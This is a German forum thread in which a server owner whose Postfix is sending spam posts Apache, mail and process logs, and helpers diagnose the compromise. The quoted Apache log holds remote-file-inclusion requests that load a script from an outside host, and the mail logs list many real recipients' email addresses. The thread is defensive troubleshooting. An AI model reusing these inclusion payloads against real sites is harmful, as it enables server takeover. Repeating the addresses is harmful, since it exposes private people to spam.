postfix hohe verbindungen

P

poshta

New Member
Hallo, ich habe mit dem Postfix Probleme, seit Heute Morgen sendener ständig mails und der load avarenge ist zeitweise auf 7 und gerade liegt er bei 4. Ein Linux Freund kümmert sich um den Server, doch der ist Momentan nicht Erreichbar(Fliterwochen in die Schweiz). Jetzt Stehe ich vor dem Problem, bin nicht Linux erfahren, ausser die Kosole zu bedienen.

Problem habe ich soweit Lokalisieren können, Joomla CMS für einen Privaten Projekt sprich Radiosender mit SAM Broadcaster: diesen user habe ich den chmod komplett auf 000 gesetzt.

sobald ich den postfix stope sinkt die belastung auf normal 0,2. wen ich postfix wieder starte, steigt es auf durchgehend 4,2 oder mehr.

könnt ihr mir helfen das problem auf den Grund zu gehen?,- ich poste alle logs die ihr benötigt, so hoffe ich das Problem auf den Grund zu gehen.

Serverdaten: Debian, Confixx, Postfix, Spamassassin.

das fällt mir auf den Appache logs auf:
Code: 
128.121.61.104 - - [03/Apr/2009:18:52:12 +0200] "GET //?commonpath=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 403 286 "-" "Mozilla/5.0" "-"
128.121.61.104 - - [03/Apr/2009:18:52:12 +0200] "GET /samPHPweb/playlist-add.php//?commonpath=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 403 313 "-" "Mozilla/5.0" "-"
128.121.61.104 - - [03/Apr/2009:18:52:12 +0200] "GET /samPHPweb//?commonpath=http://kashikicks.ru/fx29id.txt?? HTTP/1.1" 403 296 "-" "Mozilla/5.0" "-"
213.133.113.82 - - [03/Apr/2009:18:53:33 +0200] "GET / HTTP/1.1" 200 1049 "-" "-" "-"

tail -f /var/log/mail.info:
Code: 
Apr  3 17:03:00 force postfix/master[10718]: daemon started -- version 2.3.3, configuration /etc/postfix
Apr  3 17:03:04 force postfix/smtpd[10728]: connect from unknown[117.197.219.28]
Apr  3 17:03:07 force postfix/smtpd[10728]: 430E1300CE3: client=unknown[117.197.219.28]
Apr  3 17:03:07 force postfix/smtpd[10731]: warning: 190.29.7.43: address not listed for hostname adsl190-29-7-43.une.net.co
Apr  3 17:03:07 force postfix/smtpd[10731]: connect from unknown[190.29.7.43]
Apr  3 17:03:07 force postfix/qmgr[10721]: E9A7C301F5F: from=<>, size=5807, nrcpt=1 (queue active)
Apr  3 17:03:07 force postfix/qmgr[10721]: 8A02A301265: from=<>, size=5801, nrcpt=1 (queue active)
Apr  3 17:03:07 force postfix/qmgr[10721]: 48323301261: from=<>, size=5899, nrcpt=1 (queue active)

es ist nur ein teil, das geht unendlich weiter:
Code: 
Apr  3 19:14:15 force postfix/smtp[20725]: 477C02C6B12: to=<caretakersiteagent@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107864, delays=107847/17/0.22/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20724]: 4BF0A2C7E4F: to=<nicolasouthern85@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=108217, delays=108200/17/0.23/0.19, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20754]: 4E7822C7E4B: to=<obymuoneke@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=108252, delays=108235/17/0.22/0.19, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20768]: 4BB502CC4AA: to=<tonih16@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=3, delay=99647, delays=99630/17/0.04/0.41, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20750]: 47E6C2C52C3: to=<kay.dicks@btinternet.com>, relay=mx1.bt.mail.yahoo.com[217.146.188.189]:25, conn_use=7, delay=111157, delays=111138/19/0.05/0.38, dsn=5.0.0, status=bounced (host mx1.bt.mail.yahoo.com[217.146.188.189] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20743]: 4B18D2C4989: to=<kerrydoran@btinternet.com>, relay=mx1.bt.mail.yahoo.com[217.146.188.189]:25, conn_use=7, delay=111193, delays=111174/19/0.05/0.38, dsn=5.0.0, status=bounced (host mx1.bt.mail.yahoo.com[217.146.188.189] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20756]: 470C32C7805: to=<tregellauk2003@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=5, delay=99727, delays=99710/17/0.05/0.27, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20732]: 4A1CE2C4CB3: to=<june_health@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=3, delay=112064, delays=112047/17/0.05/0.26, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20757]: 4CF122C7B32: to=<tiggertc79@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=4, delay=99685, delays=99668/17/0.04/0.23, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20787]: 457D02C7B8F: to=<nettibetti3@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, conn_use=5, delay=108333, delays=108316/17/0.03/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20789]: 473192C5254: to=<kaylewis@btinternet.com>, relay=mx2.bt.mail.yahoo.com[195.50.106.135]:25, conn_use=2, delay=111257, delays=111238/19/0.03/0.32, dsn=5.0.0, status=bounced (host mx2.bt.mail.yahoo.com[195.50.106.135] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20734]: 4CEC72C4FBA: to=<neo19834@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, conn_use=4, delay=108337, delays=108320/17/0.03/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20759]: 4E5092C7DBD: to=<onepinkbit@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=108237, delays=108220/17/0.09/0.07, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20855]: 46C782C4209: to=<katiekadriu@btinternet.com>, relay=mx2.talk21.mail.yahoo.com[217.146.188.189]:25, conn_use=2, delay=111175, delays=111156/19/0.05/0.26, dsn=5.0.0, status=bounced (host mx2.talk21.mail.yahoo.com[217.146.188.189] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20764]: 4504C2C7C8E: to=<nurseryshell@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, conn_use=2, delay=108259, delays=108243/17/0.03/0.06, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20735]: 4D0292C51A3: to=<kath.williams1964@btinternet.com>, relay=mx1.bt.mail.yahoo.com[217.146.188.189]:25, conn_use=2, delay=111202, delays=111183/19/0.05/0.29, dsn=5.0.0, status=bounced (host mx1.bt.mail.yahoo.com[217.146.188.189] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20694]: 4E4712C5101: to=<kenneth.young2@btinternet.com>, relay=mx2.bt.mail.yahoo.com[195.50.106.135]:25, conn_use=2, delay=111294, delays=111275/19/0.03/0.32, dsn=5.0.0, status=bounced (host mx2.bt.mail.yahoo.com[195.50.106.135] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20744]: 47C382C4C68: to=<inesbei@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=4, delay=112062, delays=112045/17/0.04/0.26, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20785]: 534762C60AF: to=<lesley.jennings@talk21.com>, relay=mx2.talk21.mail.yahoo.com[217.12.12.192]:25, delay=110280, delays=110264/16/0.69/0.34, dsn=5.0.0, status=bounced (host mx2.talk21.mail.yahoo.com[217.12.12.192] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20692]: 45A3730091C: to=<karmail@btinternet.com>, relay=mx2.bt.mail.yahoo.com[195.50.106.135]:25, delay=110672, delays=110652/19/0.66/0.33, dsn=5.0.0, status=bounced (host mx2.bt.mail.yahoo.com[195.50.106.135] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20748]: 54F872C406A: to=<jane.hollis@talk21.com>, relay=mx2.talk21.mail.yahoo.com[217.146.188.189]:25, delay=113350, delays=113334/16/0.67/0, dsn=4.7.0, status=deferred (host mx2.talk21.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20690]: 435772C55CA: to=<kathbentley@btinternet.com>, relay=mx2.bt.mail.yahoo.com[217.146.188.189]:25, delay=110656, delays=110636/19/0.86/0, dsn=4.7.0, status=deferred (host mx2.bt.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20765]: 41A6A3005F8: to=<joanbath@btinternet.com>, relay=mx2.bt.mail.yahoo.com[217.146.188.189]:25, delay=112328, delays=112309/19/0.86/0, dsn=4.7.0, status=deferred (host mx2.bt.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20726]: 5B7862C4018: to=<jacqui.westwood@talk21.com>, relay=mx2.talk21.mail.yahoo.com[217.146.188.189]:25, delay=113356, delays=113340/16/0.63/0, dsn=4.7.0, status=deferred (host mx2.talk21.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20691]: 4B91F2C6C1B: to=<chanty_j@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, delay=107864, delays=107846/17/0.29/0.35, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20747]: 4274E2C54C3: to=<kay.cleeter@btinternet.com>, relay=mx2.bt.mail.yahoo.com[217.146.188.189]:25, delay=111067, delays=111047/19/0.86/0, dsn=4.7.0, status=deferred (host mx2.bt.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20696]: 493502C7C05: to=<cjajones1@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238v.177.142]:25, delay=107861, delays=107844/17/0.28/0.24, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20782]: 592D5300378: to=<j.burnel@talk21.com>, relay=mx2.talk21.mail.yahoo.com[217.12.12.192]:25, delay=113459, delays=113443/16/0.5/0, dsn=4.7.0, status=deferred (host mx2.talk21.mail.yahoo.com[217.12.12.192] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20749]: 4B7152C6A50: to=<boxerkev@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107865, delays=107848/17/0.24/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20752]: 48C612C7BF6: to=<nicholamullen83@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, delay=108323, delays=108305/17/0.28/0.25, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20731]: 496C32C6A07: to=<bikerbabe20042003@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107866, delays=107849/17/0.22/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20736]: 4AA7B300913: to=<karin.lake@btinternet.com>, relay=mx2.bt.mail.yahoo.com[217.146.188.189]:25, delay=110675, delays=110655/19/0.86/0, dsn=4.7.0, status=deferred (host mx2.bt.mail.yahoo.com[217.146.188.189] refused to talk to me: 421 4.7.0 [TS01] Messages from SERVER-IP temporarily deferred due to user complaints - 4.16.55.1; see http://postmaster.yahoo.com/421-ts01.html)
Apr  3 19:14:15 force postfix/smtp[20751]: 4A4C22C67D2: to=<apoc62368@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107869, delays=107851/17/0.22/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20790]: 4276B2C518D: to=<kelsey99@btinternet.com>, relay=mx1.talk21.mail.yahoo.com[195.50.106.135]:25, conn_use=5, delay=111297, delays=111278/19/0.04/0.35, dsn=5.0.0, status=bounced (host mx1.talk21.mail.yahoo.com[195.50.106.135] said: 554 Message not allowed - UP Email not accepted for policy reasons.  Please visit http://help.yahoo.com/help/us/mail/defer/defer-04.html [120] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/smtp[20753]: 4357F2C6A06: to=<beverley.chaplin@yahoo.co.uk>, relay=mx1.mail.eu.yahoo.com[217.12.11.64]:25, delay=107866, delays=107849/17/0.23/0.2, dsn=5.0.0, status=bounced (host mx1.mail.eu.yahoo.com[217.12.11.64] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/local[20905]: 06CB8300540: to=<www-data@SERVER-IP>, relay=local, delay=19, delays=0.24/16/0/3.2, dsn=2.0.0, status=sent (delivered to command: procmail -a "$EXTENSION")
Apr  3 19:14:15 force postfix/smtp[20695]: 409422CC68E: to=<troon71@yahoo.co.uk>, relay=mx2.mail.eu.yahoo.com[77.238.177.142]:25, conn_use=5, delay=99628, delays=99611/17/0.05/0.23, dsn=5.0.0, status=bounced (host mx2.mail.eu.yahoo.com[77.238.177.142] said: 554 Message not allowed - [] (in reply to end of DATA command))
Apr  3 19:14:15 force postfix/cleanup[20914]: 207AB30095B: message-id=<20090403171415.207AB30095B@SERVER-IP>
 
Such mal nach verdächtigen Ordnern in /tmp wie ... oder .irgendwas die siehst du nur mit ls -lisa. Wie es aussieht wird dein Server zum Spamversand missbraucht. Schau auch mal die Prozessliste mit ps aux durch ob da was unbekanntes dabei ist oder poste sie hier.
 
unter /tmp
zwei versteckte ordner
.ICE-unix mit 777
.X11-unix mit 777 aber ohne inhalt.
(hab sie gerade gelöscht)

root@force:/tmp# ps aux
Code: 
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   1740   564 ?        Ss   16:45   0:01 /sbin/init splash
root         2  0.0  0.0      0     0 ?        S    16:45   0:00 [migration/0]
root         3  0.0  0.0      0     0 ?        SN   16:45   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    16:45   0:00 [watchdog/0]
root         5  0.0  0.0      0     0 ?        S    16:45   0:00 [migration/1]
root         6  0.0  0.0      0     0 ?        SN   16:45   0:00 [ksoftirqd/1]
root         7  0.0  0.0      0     0 ?        S    16:45   0:00 [watchdog/1]
root         8  0.0  0.0      0     0 ?        S<   16:45   0:00 [events/0]
root         9  0.0  0.0      0     0 ?        S<   16:45   0:00 [events/1]
root        10  0.0  0.0      0     0 ?        S<   16:45   0:00 [khelper]
root        11  0.0  0.0      0     0 ?        S<   16:45   0:00 [kthread]
root        14  0.0  0.0      0     0 ?        S<   16:45   0:00 [kblockd/0]
root        15  0.0  0.0      0     0 ?        S<   16:45   0:00 [kblockd/1]
root        16  0.0  0.0      0     0 ?        S<   16:45   0:00 [kacpid]
root        17  0.0  0.0      0     0 ?        S<   16:45   0:00 [kacpi_notify]
root       101  0.0  0.0      0     0 ?        S<   16:45   0:00 [kseriod]
root       134  0.0  0.0      0     0 ?        S    16:45   0:00 [pdflush]
root       135  0.0  0.0      0     0 ?        S    16:45   0:00 [pdflush]
root       136  0.0  0.0      0     0 ?        S    16:45   0:00 [kswapd0]
root       137  0.0  0.0      0     0 ?        S<   16:45   0:00 [aio/0]
root       138  0.0  0.0      0     0 ?        S<   16:45   0:00 [aio/1]
root       766  0.0  0.0      0     0 ?        S    16:45   0:00 [kirqd]
root      1694  0.0  0.0      0     0 ?        S<   16:45   0:00 [khubd]
root      1968  0.0  0.0      0     0 ?        S<   16:45   0:11 [md0_raid1]
root      2102  0.1  0.0      0     0 ?        S<   16:45   0:24 [kjournald]
root      2264  0.0  0.0   2308   620 ?        S<s  16:45   0:00 /sbin/udevd --daemon
root      3054  0.0  0.0      0     0 ?        S<   16:45   0:00 [shpchpd]
root      3077  0.0  0.0      0     0 ?        S<   16:45   0:00 [kpsmoused]
root      6090  0.0  0.0   1712   500 tty1     Ss+  16:45   0:00 /sbin/getty 38400 tty1
root      6091  0.0  0.0   1708   500 tty2     Ss+  16:45   0:00 /sbin/getty 38400 tty2
root      6092  0.0  0.0   1712   500 tty3     Ss+  16:45   0:00 /sbin/getty 38400 tty3
root      6093  0.0  0.0   1712   504 tty4     Ss+  16:45   0:00 /sbin/getty 38400 tty4
root      6094  0.0  0.0   1708   500 tty5     Ss+  16:45   0:00 /sbin/getty 38400 tty5
root      6095  0.0  0.0   1712   504 tty6     Ss+  16:45   0:00 /sbin/getty 38400 tty6
root      6123  0.4  0.0   1760   584 ?        Ss   16:45   0:56 /sbin/syslogd
root      6140  0.0  0.0   1860   516 ?        Ss   16:45   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
bind      6166  0.5  0.4  46288  9788 ?        Ssl  16:45   1:12 /usr/sbin/named -u bind
root      6183  0.0  1.1  26608 24076 ?        Ss   16:45   0:01 /usr/sbin/spamd --create-prefs --max-children 5 --helper-home-dir -d --pidfile=/var/run/spamd.pid
root      6201  0.1  0.2   9416  5964 ?        S    16:45   0:24 python /usr/sbin/denyhosts --daemon --config=/etc/denyhosts.conf --config=/etc/denyhosts.conf
root      6369  0.0  0.0   6696   840 ?        Ss   16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6371  0.0  0.0   6696   524 ?        S    16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6372  0.0  0.0   6696   492 ?        S    16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6373  0.0  0.0   6696   492 ?        S    16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6374  0.0  0.0   6696   492 ?        S    16:45   0:00 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a shadow
root      6387  0.0  0.0   5256   948 ?        Ss   16:45   0:00 /usr/sbin/sshd
root      6399  0.0  0.0   3716   988 ?        Ss   16:45   0:00 /usr/sbin/vsftpd
root      6427  0.0  0.0   2416   844 ?        Ss   16:45   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive
root      6459  0.0  0.0   2092   708 ?        Ss   16:45   0:00 /sbin/mdadm --monitor --pid-file /var/run/mdadm.pid --mail root --daemonise --scan
daemon    6473  0.0  0.0   1984   420 ?        Ss   16:45   0:00 /usr/sbin/atd
root      6483  0.0  0.0   2320   900 ?        Ss   16:45   0:00 /usr/sbin/cron
root      6505  0.0  0.3  20832  8224 ?        S    16:45   0:00 /usr/sbin/apache
root      7535  0.0  0.1   8492  2868 ?        Ss   16:48   0:00 sshd: root@pts/0 
root      7655  0.0  0.0   4148  1820 pts/0    Ss   16:48   0:00 -bash
root     11427  0.0  0.0   1768   472 ?        S    17:29   0:00 /bin/sh -c /root/confixx/pipelog.pl
root     11428  0.0  0.0   3304  1436 ?        S    17:29   0:00 /usr/bin/perl /root/confixx/pipelog.pl
www-data 11429  0.0  0.4  24160 10020 ?        S    17:29   0:01 /usr/sbin/apache
www-data 11430  0.0  0.4  24184 10028 ?        S    17:29   0:01 /usr/sbin/apache
www-data 11431  0.0  0.5  25236 11780 ?        S    17:29   0:02 /usr/sbin/apache
www-data 11432  0.0  0.4  24448 10276 ?        S    17:29   0:04 /usr/sbin/apache
www-data 11433  0.0  0.4  24312 10204 ?        S    17:29   0:02 /usr/sbin/apache
www-data 11450  0.0  0.5  25148 11360 ?        S    17:30   0:01 /usr/sbin/apache
www-data 11452  0.0  0.4  24268 10104 ?        S    17:30   0:01 /usr/sbin/apache
www-data 11495  0.0  0.4  24040  9936 ?        S    17:33   0:01 /usr/sbin/apache
www-data 11496  0.0  0.5  25532 12048 ?        S    17:33   0:03 /usr/sbin/apache
www-data 11497  0.0  0.5  25212 11480 ?        S    17:33   0:02 /usr/sbin/apache
root     12158  0.0  0.0   1772   516 pts/0    S    17:46   0:00 /bin/sh /usr/bin/mysqld_safe
mysql    12195  0.0  0.9 119648 19680 pts/0    Sl   17:46   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --p
nobody    1570  0.4  1.3  31892 28900 ?        S    18:23   0:30 spamd child
root      1684  0.0  1.2  29660 26656 ?        S    18:23   0:02 spamd child
root     24209  0.0  0.0   4964  1692 ?        Ss   19:56   0:00 /usr/lib/postfix/master
postfix  24210  0.0  0.0   4976  1676 ?        S    19:56   0:00 pickup -l -t fifo -u -c
postfix  24211  0.0  0.0   5012  1768 ?        S    19:56   0:00 qmgr -l -t fifo -u
postfix  24214  0.0  0.1   6844  3072 ?        S    19:56   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
postfix  24216  0.0  0.1   6848  3032 ?        S    19:56   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
postfix  24218  0.0  0.0   4980  1692 ?        S    19:56   0:00 anvil -l -t unix -u -c
postfix  24220  0.0  0.1   6848  3040 ?        S    19:56   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
postfix  24222  0.0  0.1   6844  3048 ?        S    19:56   0:00 smtpd -n smtp -t inet -u -c -o content_filter spamassassin
postfix  24223  0.0  0.0   4988  1988 ?        S    19:56   0:00 trivial-rewrite -n rewrite -t unix -u -c
postfix  24327  0.0  0.0   5040  2048 ?        S    20:01   0:00 cleanup -z -t unix -u -c
postfix  24405  0.0  0.0   4980  1704 ?        S    20:06   0:00 pipe -n spamassassin -t unix user=nobody argv=/usr/bin/spamc -f -e /usr/sbin/sendmail -oi -f ${sender} ${recipient}
postfix  24409  0.0  0.0   5016  2036 ?        S    20:06   0:00 local -t unix
postfix  24420  0.0  0.0   5040  2048 ?        S    20:07   0:00 cleanup -z -t unix -u -c
669      24489  0.2  0.0   3916  1660 ?        Ss   20:11   0:01 in.qpopper -s
nobody   24663  0.0  0.0   4108  1100 ?        Ss   20:18   0:00 /usr/bin/spamc -f -e /usr/sbin/sendmail -oi -f info@....com force13p1@server.....
root     24664  0.0  0.0   2644  1008 pts/0    R+   20:18   0:00 ps aux
 
poshta said:
.ICE-unix mit 777
.X11-unix mit 777 aber ohne inhalt.
Click to expand...
Die beiden Verzeichnisse sind harmlos (dass Du sie gelöscht hast, schadet in diesem Fall nicht).

Bisher hast Du noch keine brauchbaren Fakten geliefert, aus denen man schließen könnte, woher der SPAM kommt. Die Mails mit "from=<>" sind uninteressant. Wichtiger wäre, den vollständigen Trace einer SPAM-Mail vom Connect bis zum Ausliefern zu zeigen. Hinweis: Die internen Message-IDs wie E9A7C301F5F bleiben innerhalb der Verarbeitung gleich. Desweiteren gehören die Sachen, die innerhalb eines Prozesses (=> gleiche PID "smtpd[10731]") verarbeitet werden, zusammen.
 
hallo linux admin, könnetst du mir bitte sagen bei welchen logs die infos stecken? danke für deinen feedback
 
heh, jep.
ein teil davon als code, das file "mail.info" ist fast 500 MB, die enträge nur von heute ...

Code: 
Apr  3 06:29:45 force postfix/qmgr[9731]: 91EBF6BFB02: to=<gailybear@hotmail.co.uk>, relay=none, delay=24956, delays=24956/0.12/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 985C26BFB0E: from=<www-data@force.server.xx>, size=2000, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 985C26BFB0E: to=<ganah@hotmail.co.uk>, relay=none, delay=24956, delays=24956/0.05/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9DCDB6BFB16: from=<www-data@force.server.xx>, size=2003, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9DCDB6BFB16: to=<garbutt3@hotmail.co.uk>, relay=none, delay=24955, delays=24955/0.04/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9008A6BFAE1: from=<www-data@force.server.xx>, size=2007, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9008A6BFAE1: to=<fredstrevens@hotmail.co.uk>, relay=none, delay=24958, delays=24958/0.04/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9422A6BFAEB: from=<www-data@force.server.xx>, size=4644, nrcpt=1 (queue active)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9422A6BFAEB: to=<kathpollard@hotmail.co.uk>, relay=none, delay=24958, delays=24958/0.01/0/0, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx1.hotmail.com[65.55.37.72] while sending RCPT TO)
Apr  3 06:29:45 force postfix/qmgr[9731]: 9C3C26BEFC7: from=<www-data@force.server.xx>, size=4645, nrcpt=1 (queue active)
 
Halte nach einem versteckten IRC-Bot/Server auf Deiner Maschine Ausschau.
Suche nach Verzeichnissen, die mit ",." oder ".," beginnen und untersuche, wenn vorhanden, die Ordner /var/games und /var/spool/*. Suche in allen /bin und /tmp - Verzeichnissen nach einer Datei mit dem Namen "update". Untersuche alle laufenden Cronjobs und besonders das entsprechende Logfile. Untersuche alle laufenden Prozesse nach Ihrer Quelle. "./run" = nix gut!


Code: 
GET / HTTP/1.1" 200 1049 "-" "-" "-"
GET /samPHPweb//?commonpath=http://kashikicks.ru/fx29id.txt??
...
...

Installiere mod_security ;)

Studiere das "error_log" und das "access_log" des Apachen ganz genau. 2Tage rekursiv und suche nach der Zeichenkette ".tgz"

Folgender Auszug könnte nützlich sein:

Code: 
sh: line 1: cd: /var/spool/virtual: Datei oder Verzeichnis nicht gefunden
